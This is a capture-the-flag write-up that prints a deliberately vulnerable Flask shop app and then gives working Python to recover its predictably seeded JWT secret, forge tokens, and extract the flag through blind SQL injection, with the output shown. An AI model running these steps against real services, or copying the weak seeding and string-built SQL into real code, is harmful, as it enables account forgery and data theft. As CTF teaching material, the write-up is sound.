# Your region's finest
You’ve been informed that a website might be serving as a front for a large criminal network. Part of their revenue supposedly comes from selling cookies that can make you float like an airship… A rather tempting proposition. Their slogan, it seems, is: "Always wondered how to get the coolest and the highest quality products in your region ? Search no more, this new website allows you to do so !"

Below: app.py, included in challenge.

In [ ]:
from flask import Flask, render_template, request, jsonify, redirect, url_for, make_response
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import text
from flask_jwt_extended import JWTManager, create_access_token, jwt_required, get_jwt_identity, set_access_cookies, unset_jwt_cookies, get_jwt
from werkzeug.security import generate_password_hash, check_password_hash
import os, time, random, string, math

# I saw in the official _randommodule.c in which both time and pid are used to seed the random generator
# So that must be a good idea, right ? :) Just gonna do it simpler here, but should be as safe.

up = math.floor(time.time())
random.seed(up + os.getpid())

app = Flask(__name__)
app.config['SECRET_KEY'] = "".join(random.choice(string.printable) for _ in range(32))
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////app/data/site.db'
app.config['JWT_SECRET_KEY'] = "".join(random.choice(string.printable) for _ in range(32))
app.config['JWT_TOKEN_LOCATION'] = ['cookies']
app.config['JWT_COOKIE_CSRF_PROTECT'] = False 

db = SQLAlchemy(app)
jwt = JWTManager(app)

class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(20), unique=True, nullable=False)
    password = db.Column(db.String(60), nullable=False)

class Product(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(100), nullable=False)
    description = db.Column(db.Text, nullable=False)
    price = db.Column(db.Float, nullable=False)
    image = db.Column(db.String(20), nullable=False, default='static/images/default.png')
    published = db.Column(db.Boolean, default=True)

class Flag(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    flag = db.Column(db.String(100), nullable=False)

@app.route('/')
def home():
    products = Product.query.filter_by(published=True).all()
    return render_template('home.html', products=products)

@app.route('/product/<int:product_id>')
def product(product_id):
    product = Product.query.get_or_404(product_id)
    if not product.published:
        return render_template('product.html', error="Product not available anymore")

    return render_template('product.html', product=product)

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        user = User.query.filter_by(username=username).first()
        if user and check_password_hash(user.password, password):
            access_token = create_access_token(identity=username, additional_claims={'favorite_product': None})
            resp = make_response(redirect(url_for('home')))
            set_access_cookies(resp, access_token)
            return resp
        else:
            return render_template('login.html', error="Username or password incorrect")
    return render_template('login.html')

@app.route('/logout')
def logout():
    resp = make_response(redirect(url_for('home')))
    unset_jwt_cookies(resp)
    return resp

@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        existing_user = User.query.filter_by(username=username).first()
        if existing_user:
            return render_template('register.html', error="Username already taken")
        hashed_password = generate_password_hash(password)
        new_user = User(username=username, password=hashed_password)
        db.session.add(new_user)
        db.session.commit()
        return redirect(url_for('login'))
    return render_template('register.html')

@app.route('/preferences', methods=['GET', 'POST'])
@jwt_required()
def preferences():
    claims = get_jwt()
    current_user = get_jwt_identity()
    if request.method == 'POST':
        favorite_product_id = int(request.form['favorite_product'])
        product = Product.query.get(favorite_product_id)
        if not product:
            return render_template('preferences.html', error="Product does not exist", products=Product.query.all(), current_user=current_user)
        new_token = create_access_token(identity=get_jwt_identity(), additional_claims={'favorite_product': favorite_product_id})
        resp = make_response(redirect(url_for('home')))
        set_access_cookies(resp, new_token)
        return resp
    products = Product.query.all()
    return render_template('preferences.html', products=products, favorite_product=claims.get('favorite_product'), current_user=current_user)

@app.route('/favorite_product_info')
@jwt_required()
def favorite_product_info():
    claims = get_jwt()
    favorite_product_id = claims.get('favorite_product')
    if favorite_product_id:
        favorite_product = Product.query.get(favorite_product_id)
        try:
            favorite_product = db.session.execute(text("SELECT * FROM product WHERE id = " + str(favorite_product_id))).fetchone()
        except Exception as e:
            return render_template('favorite_product_info.html', product=None, error=e)
        return render_template('favorite_product_info.html', product=favorite_product)

    return render_template('favorite_product_info.html', product=None)

@app.route('/check_auth')
@jwt_required(optional=True)
def check_auth():
    claims = get_jwt()
    return jsonify(logged_in=get_jwt_identity() is not None, favorite_product=claims.get('favorite_product')), 200

@app.route("/healthz")
def healthz():
    return jsonify(status="OK", uptime=time.time() - up)

def create_data():
    # clear all Product db
    db.session.query(Product).delete()
    
    product1 = Product(name=f'Space Cookie', description='Cookies so delicate, they might just break! No need for brute force, one bite and they’ll melt right into your hands.', price=random.randrange(10, 100))
    product2 = Product(name='Syringe', description='To, hum, inject yourself with medicine I guess ?', price=random.randrange(10, 100))
    product3 = Product(name='Cool looking leaf', description='To add a nice scent to your house :)', price=random.randrange(10, 100))
    with open("flag.txt","r") as f:
        flag = Flag(flag=f.read().strip())
    db.session.add(product1)
    db.session.add(product2)
    db.session.add(product3)
    db.session.add(flag)
    db.session.commit()

if __name__ == '__main__':
    with app.app_context():
        db.create_all()
        create_data()
    app.run(host="0.0.0.0", port=5000)

## Observations
We clearly see that random is seeded using easy-to-determine data (start time and pid).
Start time can be determined using current time and healthz uptime endpoint.

## Approach
Find start time, then bruteforce pid, we can check if we are correct by checking for prices of items.

In [ ]:
import random, requests, datetime, math, string
import jwt

def test(up, pid):
    random.seed(up + pid)
    secret_key = "".join(random.choice(string.printable) for _ in range(32))
    jwt_secret_key = "".join(random.choice(string.printable) for _ in range(32))
    r1 = random.randrange(10, 100)
    r2 = random.randrange(10, 100)
    r3 = random.randrange(10, 100)
    
    return r1 == 43 and r2 == 58 and r3 == 40

def get_up_date():
    r = requests.get("http://challenges.hackday.fr:58990/healthz")
    uptime = r.json()["uptime"]
    date = r.headers["Date"]
    date = datetime.datetime.strptime(date, "%a, %d %b %Y %H:%M:%S %Z").timestamp()
    
    return math.floor(date - uptime)

# on récup time.time() à partir de l'heure du serv & uptime
update = get_up_date()

# on bruteforce le pid
for pid in range(1, 100000):
    if test(update, pid):
        print(pid)
        break
        

random.seed(update + pid)
secret_key = "".join(random.choice(string.printable) for _ in range(32))
jwt_secret_key = "".join(random.choice(string.printable) for _ in range(32))
print(secret_key)
print(jwt_secret_key)

3602
'z`F>0YD5"7CVj8tW0%_in[&*][~>	h.
DdXRF_W.$28}[VEEQB3b/{c_
qGz-(>


We now have our jwt secret, we can check if it works using check_auth endpoint.

In [ ]:
encoded = jwt.encode({
  "fresh": False,
  "iat": 1737753741,
  "jti": "843ca2fa-45fc-4257-85ba-2a98d312302f",
  "type": "access",
  "sub": "ff",
  "nbf": 1737753741,
  "exp": 1737754641,
  "favorite_product": '-99 OR SUBSTRING((SELECT flag FROM flag), 1, 1) = "a"',
}, jwt_secret_key, algorithm="HS256")

requests.get('http://challenges.hackday.fr:58990/check_auth', cookies={
    'access_token_cookie': encoded
}).text

'{"favorite_product":"-99 OR SUBSTRING((SELECT flag FROM flag), 1, 1) = \\"a\\"","logged_in":true}\n'

It works !

Now we have to exploit a SQL injection in the search endpoint to get the flag.
```python
favorite_product = db.session.execute(text("SELECT * FROM product WHERE id = " + str(favorite_product_id))).fetchone()
```
We can't retrieve data but we can blind guess the flag (also we have the flag table structure), to do so we just have to forge jwts with the favorite_product_id set to a sqli payload.

In [ ]:
def check_cond(index, char):
    encoded = jwt.encode({
        "fresh": False,
        "iat": 1737753741,
        "jti": "843ca2fa-45fc-4257-85ba-2a98d312302f",
        "type": "access",
        "sub": "ff",
        "nbf": 1737753741,
        "exp": 1737754641,
        "favorite_product": '-99 OR SUBSTRING((SELECT flag FROM flag), {}, 1) = "{}"'.format(index, char),
    }, jwt_secret_key, algorithm="HS256")


    r2 =requests.get('http://challenges.hackday.fr:58990/favorite_product_info', cookies={
        'access_token_cookie': encoded
    }).text

    return "You don't have a favorite product yet !" not in r2

def blind_guess(index):
    for c in string.printable:
        if check_cond(index, c):
            print(index, c)
            next = blind_guess(index + 1)
            return c + next
        
    return ""

blind_guess(1)

1 H
2 A
3 C
4 K
5 D
6 A
7 Y
8 {
9 T
10 h
11 4
12 t
13 _
14 s
15 _
16 S
17 0
18 m
19 3
20 _
21 g
22 0
23 0
24 0
25 0
26 0
27 0
28 0
29 0
30 0
31 0
32 0
33 0
34 d
35 _
36 q
37 u
38 4
39 l
40 i
41 t
42 y
43 !
44 }


'HACKDAY{Th4t_s_S0m3_g000000000000d_qu4lity!}'